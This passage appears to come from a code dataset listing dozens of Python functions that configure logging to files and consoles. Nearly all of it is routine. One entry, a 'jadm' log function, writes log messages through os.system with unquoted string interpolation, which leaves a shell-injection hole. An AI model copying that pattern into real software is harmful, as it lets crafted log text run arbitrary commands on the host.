+ file_str\n write_file(filename, file_str, append=1)", "def open_log(fn):\n\n global log_file\n if fn is not None:\n d = os.path.dirname(fn)\n if d != \"\":\n makedirs(d)\n log_file = open(fn, \"a+\")", "def set_log_file(filename):\n pass", "def setup_log(self, log_file):\n directory = os.path.dirname(log_file)\n if directory:\n os.makedirs(directory, exist_ok=True)\n\n logger = logging.getLogger(log_file)\n formatter = logging.Formatter(config.LOG_FORMAT)\n\n file_handler = logging.FileHandler(log_file, mode='a')\n file_handler.setFormatter(formatter)\n\n logger.setLevel(logging.INFO)\n logger.addHandler(file_handler)\n\n return logger", "def write_logfile(filename, content, directory):\n logfile = os.path.join(directory, f\"{filename}.log\")\n f = open(logfile, 'a+')\n f.write(content)\n f.write(\"\\n\")\n f.close()\n return logfile", "def setup_logger(save_dir, distributed_rank=0, filename=\"log.txt\", mode=\"a\"):\n save_file = os.path.join(save_dir, filename)\n if mode == \"o\" and os.path.exists(save_file):\n os.remove(save_file)\n if distributed_rank > 0:\n logger.remove()\n logger.add(\n save_file, format=\"{time:YYYY-MM-DD at HH:mm:ss} | {level} | {message}\", filter=\"\", level=\"INFO\", enqueue=True\n )\n\n return logger", "def init_logging(filepath=os.path.dirname(os.path.abspath(__file__))):\r\n logfile = filepath\r\n logfile += '\\\\Logs\\\\'\r\n if not os.path.isdir(logfile):\r\n os.makedirs(logfile)\r\n logfile += datetime.now().strftime('%m-%d-%Y') + '_File_Moving.log'\r\n with open(logfile, 'w'):\r\n pass\r\n logging.basicConfig(filename=logfile, level=logging.DEBUG,\r\n format='%(levelname)s: -- %(asctime)s -- %(message)s',\r\n datefmt='%m/%d/%Y %H:%M:%S %p')", "def logsave(self):\n log_file = open(self.conf[\"output_prefix\"] + \"_log.txt\", \"w\")\n try:\n log_file.write(self.log)\n finally:\n log_file.close()", "def _create_agent_log():\n log_file = SETTINGS['agent.log_file']\n if not log_file.endswith('.rollbar'):\n log.error(\"Provided agent log file does not end with .rollbar, which it must. 
\"\n \"Using default instead.\")\n log_file = DEFAULTS['agent.log_file']\n\n retval = logging.getLogger('rollbar_agent')\n handler = logging.FileHandler(log_file, 'a', 'utf-8')\n formatter = logging.Formatter('%(message)s')\n handler.setFormatter(formatter)\n retval.addHandler(handler)\n retval.setLevel(logging.WARNING)\n return retval", "def _create_log_dir():\n if not os.path.exists(FLASK_APP.config[\"LOG_DIR\"]):\n os.makedirs(FLASK_APP.config[\"LOG_DIR\"])", "def setup_logging(log_basedir=\"logs\"):\n BASEDIR = os.path.abspath(os.path.dirname(__file__))\n LOGDIR = os.path.join(BASEDIR,log_basedir)\n \n # Check if the logs directory exists and is writable\n if not os.path.isdir(LOGDIR):\n print('ERROR: Log directory {} does not exist.'.format(LOGDIR))\n sys.exit(1)\n if not os.access(LOGDIR, os.W_OK):\n print('ERROR: No permissions to write to log directory {}.'.format(LOGDIR))\n sys.exit(1)\n\n # Set the log message format\n fmt = '%(levelname)s - %(asctime)s.%(msecs).03d %(process)d [%(filename)s:%(lineno)d] %(message)s'\n datefmt = '%m%d %H:%M:%S'\n formatter = logging.Formatter(fmt, datefmt)\n\n # Log to console\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setLevel(logging.DEBUG)\n console_handler.setFormatter(formatter)\n\n root = logging.getLogger()\n root.setLevel(logging.DEBUG)\n root.addHandler(console_handler)\n\n # Log to file, use a rotating file\n file_name = os.path.join(LOGDIR, '{}.log'.format(\"flask_api_otrs\") )\n\n file_handler = logging.handlers.RotatingFileHandler(file_name, backupCount=7)\n file_handler.setFormatter(formatter)\n root.addHandler(file_handler)", "def init_logs():\n\n #Ensure that the directories are made\n make_dirs()\n\n #Create FileHandler logging handler, set it's log level, configure the log storage format,\n # and add the formatter to the root logger\n fh = logging.FileHandler(log_file)\n fh.setLevel(logging.INFO)\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n logging.root.addHandler(fh)\n logging.root.setLevel(logging.INFO)\n\n #Report it to the world!\n logging.info(\"Saving logs to \" + log_file)", "def setup_logging(logfile=DEFAULT_LOG, max_bytes=None, backup_count=None):\n\n LOG.setLevel(logging.INFO)\n if backup_count is not None and max_bytes is not None:\n assert backup_count > 0\n assert max_bytes > 0\n ch = RotatingFileHandler(logfile, 'a', max_bytes, backup_count)\n else: # Setup stream handler.\n ch = logging.StreamHandler(sys.stdout)\n\n ch.setFormatter(logging.Formatter('%(asctime)s %(name)s[%(process)d] '\n '%(levelname)s: %(message)s'))\n LOG.addHandler(ch)", "def setlogfile(file_name):\n global logfile\n logfile = file_name", "def setup_logger() -> None:\n LOGGER.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(levelname)s \\t|%(asctime)s \\t| %(name)s \\t| %(message)s')\n\n if not check_if_dir_exists(FILENAMES.LOG_DIR):\n os.mkdir(to_abs_file_path(FILENAMES.LOG_DIR))\n\n file_handler: logging.FileHandler = logging.FileHandler(to_abs_file_path(FILENAMES.LOG), mode='w')\n file_handler.setLevel(logging.INFO)\n file_handler.setFormatter(formatter)\n\n console_handler: logging.StreamHandler = logging.StreamHandler()\n console_handler.setLevel(logging.WARNING)\n\n LOGGER.addHandler(file_handler)\n LOGGER.addHandler(console_handler)\n LOGGER.info('Filehandler and Console_Handler were born, let\\'s start logging')", "def logging_setup(args, log_dir):\n timestamp_file = datetime.now().strftime(\"%Y%m%d-%H.%M_rcf_abb.log\")\n log_file = 
Path(log_dir) / timestamp_file\n\n handlers = []\n\n if not args.skip_logfile:\n handlers.append(log.FileHandler(log_file, mode=\"a\"))\n if not args.quiet:\n handlers.append(log.StreamHandler(sys.stdout))\n\n log.basicConfig(\n level=log.DEBUG if args.debug else log.INFO,\n format=\"%(asctime)s:%(levelname)s:%(funcName)s:%(message)s\",\n handlers=handlers,\n )", "def test_init_logger_with_logfile(monkeypatch):\n log_path = f\"{gettempdir()}/{uuid()}.log\"\n assert not Path(log_path).exists()\n monkeypatch.setenv(\"LOG_OUTPUT\", log_path)\n logger = helpers.init_logger(uuid())\n msg = \"Write to disk.\"\n logger.warning(msg)\n assert Path(log_path).exists()\n with open(log_path, \"r\") as log:\n assert msg in log.read()", "def setLogFile(filename):\n\tglobal logfile\n\tlogfile = filename", "def setup_log(fileno):\n \n global logger\n logger = logging.Logger('log')\n handler = logging.StreamHandler(os.fdopen(fileno, 'a', 0))\n handler.setFormatter(logging.Formatter(\"[%(asctime)s] - [%(levelname)s] - %(message)s\", datefmt=None))\n logger.addHandler(handler)", "def init_logging(to_file=False, filename=None):\n if to_file:\n if filename is None:\n filename = timestamp() + '.log'\n logging.basicConfig(level=logging.INFO, format='%(message)s', filename=filename)\n logging.getLogger().addHandler(logging.StreamHandler(sys.stdout)) # write to stdout + file\n print('Logging to:', filename)\n else:\n logging.basicConfig(level=logging.INFO, format='%(message)s')", "def logToFile(output, file): \r\n print( output, file=file )", "def setup_logging(log_file_path,timestamp_filename=True,max_log_size=104857600):\n assert( len(log_file_path) > 1 )\n assert( type(log_file_path) == type(\"\") )\n global logger\n\n # Make sure output dir(s) exists\n log_file_folder = os.path.dirname(log_file_path)\n if log_file_folder is not None:\n if not os.path.exists(log_file_folder):\n os.makedirs(log_file_folder)\n\n # Add timetamp for filename if needed\n if timestamp_filename:\n # http://stackoverflow.com/questions/8472413/add-utc-time-to-filename-python\n # '2015-06-30-13.44.15'\n timestamp_string = datetime.datetime.utcnow().strftime(\"%Y-%m-%d %H.%M.%S%Z\")\n # Full log\n log_file_path = add_timestamp_to_log_filename(log_file_path,timestamp_string)\n\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n # 2015-07-21 18:56:23,428 - t.11028 - INFO - ln.156 - Loading page 0 of posts for u'mlpgdraws.tumblr.com'\n formatter = logging.Formatter(\"%(asctime)s - t.%(thread)d - %(levelname)s - ln.%(lineno)d - %(message)s\")\n\n # File 1, log everything\n # https://docs.python.org/2/library/logging.handlers.html\n # Rollover occurs whenever the current log file is nearly maxBytes in length; if either of maxBytes or backupCount is zero, rollover never occurs.\n fh = logging.handlers.RotatingFileHandler(\n filename=log_file_path,\n # https://en.wikipedia.org/wiki/Binary_prefix\n # 104857600 100MiB\n maxBytes=max_log_size,\n backupCount=10000,# Ten thousand should be enough to crash before we reach it.\n )\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n # Console output\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n logging.info(\"Logging started.\")\n return logger", "def establish(lvl='INFO', logName=None, logPath=None, backups=0):\n try:\n print 'Script Started. 
Setting up Logging.'\n\n # Set logging level\n if lvl == 'DEBUG':\n logLevel = logging.DEBUG\n elif lvl == 'INFO':\n logLevel = logging.INFO\n elif lvl == 'WARNING':\n logLevel = logging.WARNING\n elif lvl == 'ERROR':\n logLevel = logging.ERROR\n else:\n print 'Invalid logging level. Choose: ERROR, WARNING, INFO, DEBUG'\n return\n\n # Setup basic logging configuration to standard output stream\n logging.basicConfig(level=logLevel, format=\"%(asctime)s\\t%(levelname)s:\\t%(message)s\")\n \n if logName != None and logName.strip() != '':\n # A logName has been provided so create a log file\n if logPath == None or logPath.strip() == '':\n # If no logPath is provided, use relative path\n logPath = r'.\\\\'\n logPathName = os.path.join(logPath, str(logName).strip())\n # If backups are needed, set the write style (write/append)\n if backups == 0:\n logMode = 'w'\n else:\n logMode = 'a'\n # Setup logging to a file\n fh = logging.handlers.RotatingFileHandler(filename=logPathName, mode=logMode, backupCount=int(backups))\n fh.setLevel(logLevel)\n formatter = logging.Formatter('%(asctime)s\\t%(levelname)s:\\t%(message)s')\n fh.setFormatter(formatter)\n logging.getLogger('').addHandler(fh)\n if os.path.isfile(logPathName):\n fh.doRollover()\n info('STARTING THE SCRIPT: {0}'.format(sys.argv[0]))\n info('Script running on host: {0}'.format(socket.gethostname()))\n info('Script running under the account of: {0}'.format(os.environ.get('USERNAME')))\n info('Log file created at: {0}'.format(logPathName))\n else:\n info('STARTING THE SCRIPT: {0}'.format(sys.argv[0]))\n info('Script running on host: {0}'.format(socket.gethostname()))\n info('Script running under the account of: {0}'.format(os.environ.get('USERNAME')))\n fh = None\n return fh\n except:\n print 'Error Establishing Log: {0}'.format(traceback.format_exc())", "def create_logger(args, save_dir, fname=None):\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n\n root = logging.getLogger()\n root.setLevel(logging.INFO)\n ch = logging.StreamHandler(sys.stdout)\n ch.setLevel(logging.INFO)\n if fname is None:\n fname = 'stdout.log'\n hdlr = logging.FileHandler(os.path.join(save_dir, fname))\n hdlr.setLevel(logging.INFO)\n msg_format = '%(asctime)s [%(levelname)s] %(message)s'\n formatter = logging.Formatter(msg_format)\n ch.setFormatter(formatter)\n hdlr.setFormatter(formatter)\n root.addHandler(ch)\n root.addHandler(hdlr)\n logging.info(sys.version_info)\n logging.info(args)\n\n return logging", "def generate_log_filename():\n return \"LOG_\"+strftime(\"(%Y-%m-%d)_%H-%M-%S\", gmtime())+\".txt\"", "def log(arguments, message):\n\n # Prints the message to console if verbose is set to True.\n if arguments.verbose:\n print(message)\n\n # Logs the message within a specific log file is defined.\n if arguments.log_dir != '':\n # Creates the directory for the log files.\n os.makedirs(arguments.log_dir, exist_ok=True)\n\n # Logs the message to the log file.\n print(message, file=open(os.path.join(arguments.log_dir, f\"{arguments.experiment}_log.txt\"), 'a'))", "def initLogging ( logFile ):\n logging.basicConfig(\n filename=logFile,\n level=logging.INFO,\n format='%(asctime)s %(levelname)-8s %(message)s',\n filemode='w'\n )", "def init_logs() -> None:\n logging.basicConfig(\n filename=\"logs.txt\",\n filemode=\"w\",\n format=\"%(asctime)s:%(levelname)s:%(filename)s - %(message)s\",\n level=logging.ERROR,\n )\n\n formatter = logging.Formatter(\n \"%(asctime)s:%(levelname)s:%(filename)s - %(message)s\"\n )\n\n global logger\n logger = 
logging.getLogger(__name__)\n\n # simlogger = logging.getLogger(\"netsquid\")\n # simlogger.setLevel(logging.DEBUG)\n # fhandler = logging.FileHandler(\"simlogs.txt\", mode=\"w\")\n # fhandler.setFormatter(formatter)\n # simlogger.addHandler(fhandler)\n\n # shandler = logging.StreamHandler(stream=sys.stdout)\n # shandler.setLevel(logging.ERROR)\n # shandler.setFormatter(formatter)\n # simlogger.addHandler(shandler)", "def setup_logging(log_file_path,timestamp_filename=True,max_log_size=104857600):\n assert( len(log_file_path) > 1 )\n assert( type(log_file_path) == type(\"\") )\n global logger\n\n # Make sure output dir(s) exists\n log_file_folder = os.path.dirname(log_file_path)\n if log_file_folder is not None:\n if not os.path.exists(log_file_folder):\n os.makedirs(log_file_folder)\n\n # Add timetamp for filename if needed\n if timestamp_filename:\n # http://stackoverflow.com/questions/8472413/add-utc-time-to-filename-python\n # '2015-06-30-13.44.15'\n timestamp_string = datetime.datetime.utcnow().strftime(\"%Y-%m-%d %H.%M.%S%Z\")\n # Full log\n log_file_path = add_timestamp_to_log_filename(log_file_path,timestamp_string)\n\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n # 2015-07-21 18:56:23,428 - t.11028 - INFO - ln.156 - Loading page 0 of posts for u'mlpgdraws.tumblr.com'\n formatter = logging.Formatter(\"%(asctime)s - t.%(thread)d - %(levelname)s - ln.%(lineno)d - %(message)s\")\n\n # File 1, log everything\n # https://docs.python.org/2/library/logging.handlers.html\n # Rollover occurs whenever the current log file is nearly maxBytes in length; if either of maxBytes or backupCount is zero, rollover never occurs.\n fh = logging.handlers.RotatingFileHandler(\n filename=log_file_path,\n # https://en.wikipedia.org/wiki/Binary_prefix\n # 104857600 100MiB\n maxBytes=max_log_size,\n backupCount=10,# Ten should be enough to debug but not use too mcuh storage\n )\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\n # Console output\n ch = logging.StreamHandler()\n ch.setLevel(config.console_log_level)\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n logging.info(\"Logging started.\")\n return logger", "def daf_log():\n log_message = sys.argv.pop(0).split(\"/\")[-1]\n for i in sys.argv:\n log_message += \" \" + i\n with open(LOG_FILE_NAME, \"a\") as file_object:\n file_object.write(log_message + \"\\n\")", "def open_logfile(name):\r\n\r\n _format = \"%(asctime)s.%(msecs)03d %(name)-10s: %(levelname)-8s: %(message)s\"\r\n _datefmt = \"%H:%M:%S\"\r\n\r\n if config[\"log_dir\"] != None:\r\n filename = os.path.join(config[\"log_dir\"], name) + \".log\"\r\n else:\r\n filename = config[\"log_file\"]\r\n\r\n logger = logging.getLogger()\r\n\r\n # Remove any existing handlers\r\n for handler in logger.handlers:\r\n logger.removeHandler(handler)\r\n handler.close()\r\n\r\n # Add a new handler\r\n handler = logging.FileHandler(filename, mode='a')\r\n handler.setFormatter(logging.Formatter(_format, _datefmt))\r\n logger.addHandler(handler)", "def _init_log(self):\n if not os_path_exists(self.log_file):\n self._write('', 'w')", "def init_log(path):\n file = open(path, 'w+')\n file.close()", "def make_logger(model_dir: str, log_file: str = \"train.log\") -> Logger:\n logger = logging.getLogger(__name__)\n if not logger.handlers:\n logger.setLevel(level=logging.DEBUG)\n fh = logging.FileHandler(\"{}/{}\".format(model_dir, log_file))\n fh.setLevel(level=logging.DEBUG)\n logger.addHandler(fh)\n formatter = logging.Formatter(\"%(asctime)s 
%(message)s\")\n fh.setFormatter(formatter)\n if platform == \"linux\":\n sh = logging.StreamHandler()\n sh.setLevel(logging.INFO)\n sh.setFormatter(formatter)\n logging.getLogger(\"\").addHandler(sh)\n logger.info(\"Hello! This is Joey-NMT.\")\n return logger", "def setupLogging(self):\n\t\ttry:\n\t\t\tself.logger = logging.getLogger(__name__)\n\t\t\thandler = RotatingFileHandler(self.logFile, maxBytes=500000, backupCount=5)\n\t\t\tformat = \"%(asctime)s %(levelname)-8s %(message)s\"\n\t\t\thandler.setFormatter(logging.Formatter(format))\n\t\t\thandler.setLevel(logging.INFO)\n\t\t\tself.logger.addHandler(handler)\n\t\t\tself.logger.setLevel(logging.INFO)\n\t\texcept Exception as err:\n\t\t\terrorStr = 'Error initializing log file, ',err\n\t\t\tprint(errorStr)\n\t\t\texit(1)", "def setup_script_logging():\n #handlers = [logbook.NullHandler()]\n format_str = (\"[{record.time:%Y-%m-%dT%H:%MZ}] \"\n \"{record.level_name}: {record.message}\")\n\n #handler = logbook.StreamHandler(sys.stderr, format_string=format_str,\n # level=\"DEBUG\")\n #handler.push_thread()\n #return handler", "def setup_logging(\n format_file=\"%(asctime)s - [%(levelname)s:%(name)s] %(message)s\",\n format_stout=\"[%(levelname)s:%(name)s] %(message)s\",\n level=logging.INFO,\n filename=f\"{DIR_SIMFILES}/_mdsea_logdump.log\",\n maxbytes=500000, # 500 kB\n) -> None:\n import logging\n import os\n\n looger_root = logging.getLogger(\"mdsea\")\n looger_root.setLevel(level=level)\n\n # SUPPRESSED_MODULES = (\"matplotlib\", \"apptools\", \"asyncio\", \"mayavi\", \"pyface\")\n\n # Set StreamHandler\n handler = logging.StreamHandler()\n handler.setFormatter(logging.Formatter(fmt=format_stout))\n handler.setLevel(level=level)\n looger_root.addHandler(handler)\n\n # Check if the directory where the log will live exists\n _dir = \"/\".join(filename.split(\"/\")[:-1])\n if not os.path.exists(_dir):\n os.mkdir(_dir)\n\n # Set RotatingFileHandler\n handler = RotatingFileHandler(filename, maxBytes=maxbytes, backupCount=1)\n handler.setFormatter(fmt=logging.Formatter(format_file))\n handler.setLevel(level=level)\n looger_root.addHandler(handler)\n\n looger_root.debug(\"logging setup successful!\")", "def instantiate_logs(self):\n\n # Log file\n timestamp = datetime.now().strftime(\"%Y-%m-%dT%H%M%S\")\n self.log_dir = os.path.join(\"experiment_logs\", timestamp)\n\n # Create Log directory if it does not exist\n try:\n os.makedirs(self.log_dir)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise\n\n self.info_file = os.path.join(self.log_dir, \"run_info.txt\")\n self.log_file = os.path.join(self.log_dir, \"data.csv\")\n\n with open(self.info_file, \"w+\") as f:\n f.write(\"Period = {}\\nMaxVel = {}\".format(self.period, self.max_vel))\n\n self.log_file_desc = open(self.log_file, \"w+\")\n self.log_file_desc.write(\"t, current_vel, current_h_angle, current_v_angle, x, y, z, roll, pitch, yaw\")", "def init_logfile(self):\n\t\tif os.path.exists(self.logfile):\n\t\t\t# move the logfile aside and compress it\n\t\t\tbz_file = bz2.BZ2File(\"%s.bz2\" % self.logfile,'w')\n\t\t\tlog = open(self.logfile,'r')\n\t\t\tbz_file.writelines(log.readlines())\n\t\t\tlog.close()\n\t\t\tbz_file.close()\n\t\t#print \"Logging output to %s\" % self.logfile\n\t\tdate = dateutil.get_datetime()\n\t\ttime = dateutil.get_datetime(1)\n\t\tnew_file = open(self.logfile,'w')\n\t\tnew_file.write(\"#------------------------- RSYNC LOG -------------------------\\n#\\n\")\n\t\tnew_file.write(\"#%12s: %s\\n\" % ('Date',date))\n\t\tnew_file.write(\"#%12s: 
%s\\n\" % ('Time',time))\n\t\tnew_file.write(\"#%12s: %s\\n\" % ('Source',self.source))\n\t\tnew_file.write(\"#%12s: %s\\n\" % ('Destination',self.destination))\n\t\tnew_file.write(\"#%12s: %s\\n\" % ('Command',self.command))\n\t\tnew_file.write(\"#%12s: %s\\n\\n\" % ('Logfile',self.logfile))\n\t\tnew_file.close()\n\t\treturn True", "def open_logfile(self):\r\n if self.output_option == 2:\r\n self.ER_file = open(self.result_filename, 'w')", "def make_log(process_id):\n filename = map_maker.logfile(process_id)\n if os.path.exists(filename):\n return flask.send_file(filename)\n else:\n flask.abort(404, 'Missing log file')", "def log_to_file(self, filename=None):\n if not filename:\n filename = '%s/../../output/sentimentpy.log' % os.path.dirname(os.path.realpath(__file__))\n file_handler = RotatingFileHandler(filename, 'a', 1000000, 1)\n file_handler.setLevel(logging.DEBUG)\n file_handler.setFormatter(self.formatter)\n self.log.addHandler(file_handler)\n return self", "def configLogging():\n # define a basic logger to write to file\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(levelname)-8s %(message)s',\n datefmt='%a, %d %b %Y %H:%M:%S',\n filename='/tmp/execute_pomset.log',\n filemode='w')\n\n # end def configureLogging\n pass", "def _create_logger(title, log_msg_id=\"\", log_file_suffix=\".log\"):\n\n logging.setLoggerClass(SkidlLogger)\n logger = logging.getLogger(title)\n\n # Errors & warnings always appear on the terminal.\n handler = logging.StreamHandler(sys.stderr)\n handler.setLevel(logging.WARNING)\n handler.setFormatter(logging.Formatter(log_msg_id + \"%(levelname)s: %(message)s\"))\n logger.addHandler(handler)\n\n # Errors and warnings are stored in a log file with the top-level script's name.\n handler = SkidlLogFileHandler(get_script_name() + log_file_suffix, mode=\"w\")\n handler.setLevel(logging.WARNING)\n handler.setFormatter(logging.Formatter(log_msg_id + \"%(levelname)s: %(message)s\"))\n logger.addHandler(handler)\n\n # Set logger to trigger on info, warning, and error messages.\n logger.setLevel(logging.INFO)\n\n # Augment the logger's functions to count the number of errors and warnings.\n logger.error = CountCalls(logger.error)\n logger.warning = CountCalls(logger.warning)\n\n return logger", "def logger(level, log_info):\n log_path = getconfig(\"log\", \"LOG_PATH\")\n log_level = getconfig(\"log\", \"LOG_LEVEL\")\n log_enable = getconfig(\"log\", \"LOG_ENABLE\")\n log_fname = getconfig(\"log\", \"LOG_FNAME\")\n if not os.path.exists(log_path):\n os.makedirs(log_path)\n log_file = os.path.join(log_path, log_fname)\n # base on input string \"DEBUG\",\"ERROR\"... 
get level number\n lvl = l_type_lst.index(level)\n\n # now, begin to write into log file\n log_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n log_pid = os.getpid()\n log_script = sys._getframe().f_back.f_code.co_filename.split('/')[-1]\n log_method = sys._getframe().f_back.f_code.co_name\n log_line = sys._getframe().f_back.f_lineno\n with open(log_file, \"a\") as log:\n if lvl <= int(log_level) and bool(log_enable):\n log.write(\"%s %s %s %s:%s:%s %s\\\n\\n\" % (log_time, log_pid, level, log_script, log_method, log_line, log_info))", "def init_log_file(folder_path, suffix=None, log_level=logging.INFO):\n\n timestamp = datetime.datetime.now().strftime(\"%Y%m%d_%H%M%S\")\n log_format = '[%(levelname)s]: %(asctime)s %(message)s'\n\n if suffix is not None:\n file_name = timestamp + '_' + suffix\n else:\n file_name = timestamp\n\n file_path = os.path.join(folder_path, file_name)\n logging.basicConfig(filename=file_path, level=log_level, format=log_format)\n logging.getLogger().addHandler(logging.StreamHandler(sys.stdout))\n\n return file_path", "def __init__(self, abs_path_logfile):\n\n self.logger = logging.getLogger()\n self.logger.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n handler = logging.handlers.TimedRotatingFileHandler(abs_path_logfile, when='D', interval=1)\n handler.setLevel(logging.DEBUG)\n handler.setFormatter(formatter)\n self.logger.addHandler(handler)", "def append_logfile(message=None, logfile=log, path=cwd):\n if message is None:\n return\n # Wrap the text if it is greater than 80 - 25 = 55 characters.\n # Indent 25 spaces to on left to allow for width of time stamp\n wrapper = textwrap.TextWrapper()\n wrapper.initial_indent = \" \" * 25\n wrapper.subsequent_indent = \" \" * 25\n wrapper.width = 80\n message = wrapper.fill(message).lstrip()\n\n if debug: print(path + logfile)\n f = open(path + logfile, \"a\")\n # Truncate the 6 digit microseconds to be 3 digits of milli-seconds\n stamp = (\"{0:%Y-%m-%d %H:%M:%S}.{1}:\".format(datetime.datetime.now(),\n datetime.datetime.now().strftime(\"%f\")[:-3]))\n if debug: print(stamp + \" \" + message)\n f.write(stamp + \" \" + message + \"\\n\")", "def configure_py_log(directory=None, filename=sys.argv[0], mode=\"w\"):\n if directory is None:\n logging.basicConfig(\n level=logging.INFO,\n format=\"[%(asctime)s] [%(levelname)s] %(name)s: %(message)s\",\n )\n else:\n logging.basicConfig(\n filename=os.path.join(directory, filename),\n filemode=mode,\n level=logging.INFO,\n format=\"[%(asctime)s] [%(levelname)s] %(name)s: %(message)s\",\n )", "def create_logger(log_dir=None):\n if log_dir and not os.path.exists(log_dir):\n os.makedirs(log_dir)\n log_format = '%(asctime)s %(process)d [%(levelname)s] %(message)s'\n logging.basicConfig(level=logging.INFO, format=log_format)\n logger = logging.getLogger('es_on_gke')\n if log_dir:\n log_file = os.path.join(log_dir, 'log.txt')\n file_hdl = logging.FileHandler(log_file)\n formatter = logging.Formatter(fmt=log_format)\n file_hdl.setFormatter(formatter)\n logger.addHandler(file_hdl)\n return logger", "def create_logger(log_dir):\n logger = logging.getLogger(__file__)\n logger.setLevel(logging.INFO)\n\n # file logger\n log_filename = \"probabilist_connectogram_%s.log\" % time.strftime(\"%Y-%m-%d_%H:%M:%S\")\n if log_dir:\n log_path = os.path.join(log_dir, log_filename)\n else:\n log_path = log_filename\n file_handler = logging.FileHandler(log_path)\n formatter = logging.Formatter('%(asctime)s :: %(message)s')\n 
file_handler.setFormatter(formatter)\n file_handler.setLevel(logging.DEBUG)\n logger.addHandler(file_handler)\n\n # console logger\n console_handler = logging.StreamHandler()\n console_handler.setLevel(logging.DEBUG)\n console_handler.setFormatter(formatter)\n logger.addHandler(console_handler)\n\n logger.info(\"Log path: %s\" % log_path)\n\n return logger", "def setup_logger(filename):\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n\n fh = logging.FileHandler(filename)\n fh.setLevel(logging.DEBUG)\n\n ch = logging.StreamHandler(sys.stdout)\n ch.setLevel(logging.DEBUG)\n\n mac_addr = hex(uuid.getnode()).replace('0x', '')\n formatter = logging.Formatter(\n f'%(asctime)s - %(levelname)s - {mac_addr} - %(name)s: %(message)s')\n\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n\n logger.addHandler(fh)\n logger.addHandler(ch)\n\n logger.info('Logger is created.')", "def log(string):\n\n print string\n\n# data and time\n dt = datetime.now().strftime(\"%b %d %H:%M:%S\")\n\n# check if log file exist / if not create it\n check_logf = os.path.isfile(logfile)\n if check_logf == False:\n os.system(\"touch %s\" % (logfile))\n firstlog = \"%s %s jadm: jadm log file was created!\" % (dt, os.uname()[1])\n os.system(\"echo '%s' > %s\" % (firstlog, logfile))\n\n# applay string to log file\n string = \"%s %s jadm: %s\" % (dt, os.uname()[1], string)\n os.system(\"echo '%s' >> %s\" % (string, logfile))", "def setupLogger():\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)s %(levelname)s: %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filename='prepareToSubmit.log',\n filemode='w')\n # define a Handler which writes INFO messages or higher to the sys.stderr\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n # set a format which is simpler for console use\n formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\n # tell the handler to use this format\n console.setFormatter(formatter)\n # add the handler to the root logger\n logging.getLogger('').addHandler(console)", "def setup_logging(log_filename):\n # set up logging to file - see previous section for more details\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M',\n filename=log_filename,\n filemode='w')\n # define a Handler which writes INFO messages or higher to the sys.stderr\n console = logging.StreamHandler()\n console.setLevel(logging.DEBUG)\n # set a format which is simpler for console use\n formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\n # tell the handler to use this format\n console.setFormatter(formatter)\n # add the handler to the root logger\n logging.getLogger('').addHandler(console)", "def setup_audit_log(cfg=CFG):\n if not runez.DRYRUN and not runez.log.file_handler:\n runez.log.setup(\n file_format=\"%(asctime)s %(timezone)s [%(process)d] %(context)s%(levelname)s - %(message)s\",\n file_level=logging.DEBUG,\n file_location=cfg.meta.full_path(\"audit.log\"),\n greetings=\":: {argv}\",\n rotate=\"size:500k\",\n rotate_count=1,\n )", "def writeToLogFile(self, event):\n outPutStr = '{:013}'.format(0)\n logOutPutStr = outPutStr + '\\t' + '{:.2f}'.format (time ()) + '\\t' + event + '\\t' + datetime.fromtimestamp (int (time())).isoformat (' ')\n printOutPutStr = outPutStr + '\\t' + datetime.fromtimestamp (int (time())).isoformat (' ') + '\\t' + event\n print (printOutPutStr)\n if self.logFP is not None:\n self.logFP.write(logOutPutStr + '\\n')\n 
self.logFP.flush()", "def _init_logger(self):\n # Create log directory, if it doesn't already exist.\n self._create_directory(directory=self._log_directory)\n log_filename = \"{0}/{1}.log\".format(self._log_directory, self._program)\n\n # Add the date to the log file names.\n logging.basicConfig(\n filename=log_filename,\n filemode='w',\n level=logging.DEBUG,\n format='%(asctime)s|%(name)s|%(levelname)-5s| %(message)s',\n datefmt='%Y-%m-%d %I:%M:%S %p')\n\n # define a Handler which writes LOG messages or higher to the sys.stderr\n console = logging.StreamHandler()\n #\n # Note: Anything above the logging level is displayed to stdout.\n #\n # Level Numeric value\n # CRITICAL\t50\n # ERROR \t40\n # WARNING\t30\n # LOG 25 (our log level)\n # INFO\t 20\n # DEBUG \t10\n # NOTSET\t0\n #\n # Add a logging level to always display to stderr.\n logging.addLevelName(self._LOG_LEVEL, self._LOG_NAME)\n if self._debug:\n console.setLevel(logging.DEBUG)\n else:\n console.setLevel(self._LOG_LEVEL)\n # Set a format which is simpler for console use.\n formatter = logging.Formatter('%(name)s|%(levelname)-5s| %(message)s')\n console.setFormatter(formatter)\n # Add the handler to the root logger.\n logging.getLogger('').addHandler(console)\n self._logger = logging.getLogger()", "def setup_logger():\n logger = logging.getLogger('tracking_log')\n logger.setLevel(logging.INFO)\n #Where to Store needs to be identified?\n f_handler = logging.FileHandler(PROCESSED_LOGFILE, mode='a', encoding = None, delay = False)\n f_handler.setLevel(logging.INFO)\n f_format = logging.Formatter('%(asctime)s\\t%(message)s\\t%(dataset_id)s\\t%(status)s')\n 